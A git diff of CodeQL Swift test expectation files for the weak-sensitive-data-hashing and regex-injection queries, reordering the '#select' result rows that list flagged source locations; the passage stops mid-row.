b/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.expected index 67c2e2f49302..ebb8154b0f8e 100644 --- a/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.expected +++ b/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.expected @@ -1,40 +1,3 @@ -#select -| testCryptoKit.swift:86:43:86:43 | cert | testCryptoKit.swift:86:43:86:43 | cert | testCryptoKit.swift:86:43:86:43 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:86:43:86:43 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:88:43:88:43 | account_no | testCryptoKit.swift:88:43:88:43 | account_no | testCryptoKit.swift:88:43:88:43 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:88:43:88:43 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:89:43:89:43 | credit_card_no | testCryptoKit.swift:89:43:89:43 | credit_card_no | testCryptoKit.swift:89:43:89:43 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:89:43:89:43 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:93:36:93:36 | cert | testCryptoKit.swift:93:36:93:36 | cert | testCryptoKit.swift:93:36:93:36 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:93:36:93:36 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:95:36:95:36 | account_no | testCryptoKit.swift:95:36:95:36 | account_no | testCryptoKit.swift:95:36:95:36 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:95:36:95:36 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:96:36:96:36 | credit_card_no | testCryptoKit.swift:96:36:96:36 | credit_card_no | testCryptoKit.swift:96:36:96:36 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:96:36:96:36 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:100:44:100:44 | cert | testCryptoKit.swift:100:44:100:44 | cert | testCryptoKit.swift:100:44:100:44 | cert | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:100:44:100:44 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:102:44:102:44 | account_no | testCryptoKit.swift:102:44:102:44 | account_no | testCryptoKit.swift:102:44:102:44 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:102:44:102:44 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:103:44:103:44 | credit_card_no | testCryptoKit.swift:103:44:103:44 | credit_card_no | testCryptoKit.swift:103:44:103:44 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:103:44:103:44 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:130:23:130:23 | cert | testCryptoKit.swift:130:23:130:23 | cert | testCryptoKit.swift:130:23:130:23 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:130:23:130:23 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:132:23:132:23 | account_no | testCryptoKit.swift:132:23:132:23 | account_no | testCryptoKit.swift:132:23:132:23 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:132:23:132:23 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:133:23:133:23 | credit_card_no | testCryptoKit.swift:133:23:133:23 | credit_card_no | testCryptoKit.swift:133:23:133:23 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:133:23:133:23 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:139:23:139:23 | cert | testCryptoKit.swift:139:23:139:23 | cert | testCryptoKit.swift:139:23:139:23 | cert | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:139:23:139:23 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:141:23:141:23 | account_no | testCryptoKit.swift:141:23:141:23 | account_no | testCryptoKit.swift:141:23:141:23 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:141:23:141:23 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:142:23:142:23 | credit_card_no | testCryptoKit.swift:142:23:142:23 | credit_card_no | testCryptoKit.swift:142:23:142:23 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:142:23:142:23 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:175:32:175:32 | cert | testCryptoKit.swift:175:32:175:32 | cert | testCryptoKit.swift:175:32:175:32 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:175:32:175:32 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:177:32:177:32 | account_no | testCryptoKit.swift:177:32:177:32 | account_no | testCryptoKit.swift:177:32:177:32 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:177:32:177:32 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:178:32:178:32 | credit_card_no | testCryptoKit.swift:178:32:178:32 | credit_card_no | testCryptoKit.swift:178:32:178:32 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:178:32:178:32 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:184:32:184:32 | cert | testCryptoKit.swift:184:32:184:32 | cert | testCryptoKit.swift:184:32:184:32 | cert | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:184:32:184:32 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:186:32:186:32 | account_no | testCryptoKit.swift:186:32:186:32 | account_no | testCryptoKit.swift:186:32:186:32 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:186:32:186:32 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:187:32:187:32 | credit_card_no | testCryptoKit.swift:187:32:187:32 | credit_card_no | testCryptoKit.swift:187:32:187:32 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:187:32:187:32 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:231:44:231:44 | value1 | testCryptoKit.swift:230:23:230:23 | cardNumber | testCryptoKit.swift:231:44:231:44 | value1 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:230:23:230:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoKit.swift:235:39:235:39 | value2 | testCryptoKit.swift:233:23:233:23 | cardNumber | testCryptoKit.swift:235:39:235:39 | value2 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:233:23:233:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoKit.swift:238:51:238:51 | value3 | testCryptoKit.swift:237:23:237:23 | cardNumber | testCryptoKit.swift:238:51:238:51 | value3 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:237:23:237:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoKit.swift:251:43:251:43 | value | testCryptoKit.swift:240:23:240:23 | cardNumber | testCryptoKit.swift:251:43:251:43 | value | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:240:23:240:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoKit.swift:255:37:255:37 | value | testCryptoKit.swift:243:23:243:23 | cardNumber | testCryptoKit.swift:255:37:255:37 | value | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:243:23:243:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:200:9:200:9 | medicalData | testCryptoSwift.swift:200:9:200:9 | medicalData | testCryptoSwift.swift:200:9:200:9 | medicalData | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:200:9:200:9 | medicalData | sensitive data (private information medicalData) | -| testCryptoSwift.swift:203:9:203:9 | medicalData | testCryptoSwift.swift:203:9:203:9 | medicalData | testCryptoSwift.swift:203:9:203:9 | medicalData | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:203:9:203:9 | medicalData | sensitive data (private information medicalData) | -| testCryptoSwift.swift:218:9:218:9 | creditCardNumber | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | sensitive data (private information creditCardNumber) | -| testCryptoSwift.swift:221:9:221:9 | creditCardNumber | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | sensitive data (private information creditCardNumber) | edges | testCryptoKit.swift:230:18:230:38 | call to Data.init(_:) | testCryptoKit.swift:231:44:231:44 | value1 | provenance | | | testCryptoKit.swift:230:23:230:23 | cardNumber | testCryptoKit.swift:230:23:230:34 | .utf8 | provenance | | @@ -112,3 +75,40 @@ nodes | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | semmle.label | creditCardNumber | | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | semmle.label | creditCardNumber | subpaths +#select +| testCryptoKit.swift:86:43:86:43 | cert | testCryptoKit.swift:86:43:86:43 | cert | testCryptoKit.swift:86:43:86:43 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:86:43:86:43 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:88:43:88:43 | account_no | testCryptoKit.swift:88:43:88:43 | account_no | testCryptoKit.swift:88:43:88:43 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:88:43:88:43 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:89:43:89:43 | credit_card_no | testCryptoKit.swift:89:43:89:43 | credit_card_no | testCryptoKit.swift:89:43:89:43 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:89:43:89:43 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:93:36:93:36 | cert | testCryptoKit.swift:93:36:93:36 | cert | testCryptoKit.swift:93:36:93:36 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:93:36:93:36 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:95:36:95:36 | account_no | testCryptoKit.swift:95:36:95:36 | account_no | testCryptoKit.swift:95:36:95:36 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:95:36:95:36 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:96:36:96:36 | credit_card_no | testCryptoKit.swift:96:36:96:36 | credit_card_no | testCryptoKit.swift:96:36:96:36 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:96:36:96:36 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:100:44:100:44 | cert | testCryptoKit.swift:100:44:100:44 | cert | testCryptoKit.swift:100:44:100:44 | cert | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:100:44:100:44 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:102:44:102:44 | account_no | testCryptoKit.swift:102:44:102:44 | account_no | testCryptoKit.swift:102:44:102:44 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:102:44:102:44 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:103:44:103:44 | credit_card_no | testCryptoKit.swift:103:44:103:44 | credit_card_no | testCryptoKit.swift:103:44:103:44 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:103:44:103:44 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:130:23:130:23 | cert | testCryptoKit.swift:130:23:130:23 | cert | testCryptoKit.swift:130:23:130:23 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:130:23:130:23 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:132:23:132:23 | account_no | testCryptoKit.swift:132:23:132:23 | account_no | testCryptoKit.swift:132:23:132:23 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:132:23:132:23 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:133:23:133:23 | credit_card_no | testCryptoKit.swift:133:23:133:23 | credit_card_no | testCryptoKit.swift:133:23:133:23 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:133:23:133:23 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:139:23:139:23 | cert | testCryptoKit.swift:139:23:139:23 | cert | testCryptoKit.swift:139:23:139:23 | cert | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:139:23:139:23 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:141:23:141:23 | account_no | testCryptoKit.swift:141:23:141:23 | account_no | testCryptoKit.swift:141:23:141:23 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:141:23:141:23 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:142:23:142:23 | credit_card_no | testCryptoKit.swift:142:23:142:23 | credit_card_no | testCryptoKit.swift:142:23:142:23 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:142:23:142:23 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:175:32:175:32 | cert | testCryptoKit.swift:175:32:175:32 | cert | testCryptoKit.swift:175:32:175:32 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:175:32:175:32 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:177:32:177:32 | account_no | testCryptoKit.swift:177:32:177:32 | account_no | testCryptoKit.swift:177:32:177:32 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:177:32:177:32 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:178:32:178:32 | credit_card_no | testCryptoKit.swift:178:32:178:32 | credit_card_no | testCryptoKit.swift:178:32:178:32 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:178:32:178:32 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:184:32:184:32 | cert | testCryptoKit.swift:184:32:184:32 | cert | testCryptoKit.swift:184:32:184:32 | cert | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:184:32:184:32 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:186:32:186:32 | account_no | testCryptoKit.swift:186:32:186:32 | account_no | testCryptoKit.swift:186:32:186:32 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:186:32:186:32 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:187:32:187:32 | credit_card_no | testCryptoKit.swift:187:32:187:32 | credit_card_no | testCryptoKit.swift:187:32:187:32 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:187:32:187:32 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:231:44:231:44 | value1 | testCryptoKit.swift:230:23:230:23 | cardNumber | testCryptoKit.swift:231:44:231:44 | value1 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:230:23:230:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoKit.swift:235:39:235:39 | value2 | testCryptoKit.swift:233:23:233:23 | cardNumber | testCryptoKit.swift:235:39:235:39 | value2 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:233:23:233:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoKit.swift:238:51:238:51 | value3 | testCryptoKit.swift:237:23:237:23 | cardNumber | testCryptoKit.swift:238:51:238:51 | value3 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:237:23:237:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoKit.swift:251:43:251:43 | value | testCryptoKit.swift:240:23:240:23 | cardNumber | testCryptoKit.swift:251:43:251:43 | value | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:240:23:240:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoKit.swift:255:37:255:37 | value | testCryptoKit.swift:243:23:243:23 | cardNumber | testCryptoKit.swift:255:37:255:37 | value | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:243:23:243:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:200:9:200:9 | medicalData | testCryptoSwift.swift:200:9:200:9 | medicalData | testCryptoSwift.swift:200:9:200:9 | medicalData | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:200:9:200:9 | medicalData | sensitive data (private information medicalData) | +| testCryptoSwift.swift:203:9:203:9 | medicalData | testCryptoSwift.swift:203:9:203:9 | medicalData | testCryptoSwift.swift:203:9:203:9 | medicalData | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:203:9:203:9 | medicalData | sensitive data (private information medicalData) | +| testCryptoSwift.swift:218:9:218:9 | creditCardNumber | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | sensitive data (private information creditCardNumber) | +| testCryptoSwift.swift:221:9:221:9 | creditCardNumber | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | sensitive data (private information creditCardNumber) | diff --git a/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.expected b/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.expected index 04dafbd0b5e9..1a26f9211971 100644 --- a/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.expected +++ b/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.expected @@ -1,27 +1,3 @@ -#select -| tests.swift:101:16:101:16 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:101:16:101:16 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:104:16:104:40 | ... .+(_:_:) ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:104:16:104:40 | ... .+(_:_:) ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:106:16:106:16 | "..." | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:106:16:106:16 | "..." | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:109:16:109:39 | ... ? ... : ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:109:16:109:39 | ... ? ... : ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:110:16:110:37 | ... ? ... : ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:110:16:110:37 | ... ? ... : ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:113:24:113:24 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:113:24:113:24 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:114:45:114:45 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:114:45:114:45 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:120:19:120:19 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:120:19:120:19 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:126:40:126:40 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:126:40:126:40 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:131:39:131:39 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:131:39:131:39 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:137:40:137:40 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:137:40:137:40 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:144:16:144:16 | remoteInput | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:144:16:144:16 | remoteInput | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:147:39:147:39 | regexStr | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:147:39:147:39 | regexStr | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:162:17:162:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:162:17:162:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:164:17:164:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:164:17:164:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:167:17:167:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:167:17:167:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:170:17:170:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:170:17:170:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:173:17:173:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:173:17:173:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:176:17:176:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:176:17:176:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:179:17:179:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:179:17:179:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:182:17:182:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:182:17:182:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:185:17:185:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:185:17:185:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:190:21:190:21 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:190:21:190:21 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | edges | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:101:16:101:16 | taintedString | provenance | | | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:104:16:104:40 | ... .+(_:_:) ... | provenance | | @@ -72,3 +48,27 @@ nodes | tests.swift:185:17:185:17 | taintedString | semmle.label | taintedString | | tests.swift:190:21:190:21 | taintedString | semmle.label | taintedString | subpaths +#select +| tests.swift:101:16:101:16 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:101:16:101:16 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:104:16:104:40 | ... .+(_:_:) ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:104:16:104:40 | ... .+(_:_:) ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:106:16:106:16 | "..." | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:106:16:106:16 | "..." | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:109:16:109:39 | ... ? ... : ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:109:16:109:39 | ... ? ... : ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:110:16:110:37 | ... ? ... : ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:110:16:110:37 | ... ? ... : ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:113:24:113:24 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:113:24:113:24 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:114:45:114:45 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:114:45:114:45 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:120:19:120:19 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:120:19:120:19 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:126:40:126:40 | taintedString | tests.swift:95:22:95:46 | call to 